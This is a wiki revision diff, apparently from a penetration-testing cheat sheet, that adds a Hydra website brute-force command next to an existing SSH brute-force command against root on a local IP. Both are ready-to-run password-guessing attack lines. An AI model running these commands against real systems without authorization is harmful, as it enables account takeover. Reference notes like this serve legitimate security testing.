Changes

Jump to navigation Jump to search
149 bytes added ,  21:41, 25 December 2017
Line 112: Line 112:     
== Hydra ==
 
== Hydra ==
 +
 +
 +
=== Website Bruteforce ===
 +
hydra www.example.com -L /usr/share/wordlists/users.txt -P /usr/share/wordlists/passwords.txt -V -f http-get /members
 +
 
=== SSH bruteforce ===
 
=== SSH bruteforce ===
 
  hydra -s 22 -v -V -l root -P <path_to_wordlist> -e -ns -t 16 192.168.0.101 ssh
 
  hydra -s 22 -v -V -l root -P <path_to_wordlist> -e -ns -t 16 192.168.0.101 ssh

Navigation menu